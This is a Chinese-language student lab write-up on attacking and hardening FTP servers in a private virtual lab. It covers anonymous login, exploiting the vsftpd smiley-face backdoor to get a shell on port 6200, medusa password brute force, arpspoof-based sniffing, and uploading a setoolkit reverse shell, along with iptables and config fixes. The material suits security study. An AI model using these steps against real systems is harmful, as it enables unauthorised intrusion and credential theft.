首先保证虚03拟机,kali虚拟机,metasploitable虚拟机主机相互ping的通。
FTP是C/S的模式。位于网络传输协议的应用层,21号端口通信。
03 ip 192.168.10.128
metasploitable ip 192.168.10.129 (简称meta)
kali ip 192.168.10.133
主机 ip 192.168.1.4
FTP在03,meta上搭建。
站点搭建
控制面板-》添加或删除程序-》添加删除组件-》应用程序服务器-》IIS的详细信息-》勾选FTP服务。
然后搭建的站点IIS中才会出现FTP站点
在kali上操作正常登陆
nc 192.168.10.128 21
user xxx
pass xxx
在kaili上匿名登陆
nc 192.168.10.128 21
user anonymous
pass 123 (密码输任意均可)
采用匿名登陆的方法
要勾选允许匿名连接
利用nmap探测漏洞笑脸漏洞
nmap --script=vuln -p 21 192.168.1.133
这就是笑脸漏洞,当FTP认证时,如果用户名中包含:) 则会出发监听6200号端接口的连接的shell
此时用nmap -p 6200 192.168.10.133查看连接情况
进行nc 192.168.10.133连接后
然后连接6200端口
完成漏洞利用
安全配置
防火墙 (解决后门)
iptables -A INPUT -p tcp -dport 6200 -j DROP
建立入站规则,不能从6200号端口进来
iptables -A OUTPUT -p tcp sport 6200 -j DROP
建立出站规则,不能从6200号端口出去
更改配置文件(解决匿名漏洞)
vsftp.conf allow_anonymous = no
FTP暴力破解
使用工具medusa(apt-get install medus)
medusa -h 192.168.10.128 -u admin1 -P /root/Desktop/dic.txt -M ftp
FTP嗅探(apt-get install dsniff)
(后来发现这个不成功,用另一台ubunt完成了这个实验,因为主机和kali不在同一网段)
使用arpspoof
arpsnoof - i eth0 192.168.1.1 -t 192.168.1.4
这里的ip是要欺骗的主机的网关和ip,eth0是kali的网卡。
FTP上传shell(在kali中生成,在主机中向03的FTP服务器上传)
使用setoolkit生成反弹shell。
通过xftp上传(一个软件)或者通过命令行上传
命令行
ftp 192.168.10.128
admin1
admin1
输入命令 PUT 文件路径
上传成功后
sessions -l 查看所有上传的连接
sessions - i 1 使用连接1
遇到的问题
错把03主机的Microsoft FTP Service当作笑脸漏洞。
FTP站点匿名登陆失败,重新安装了一遍成功了。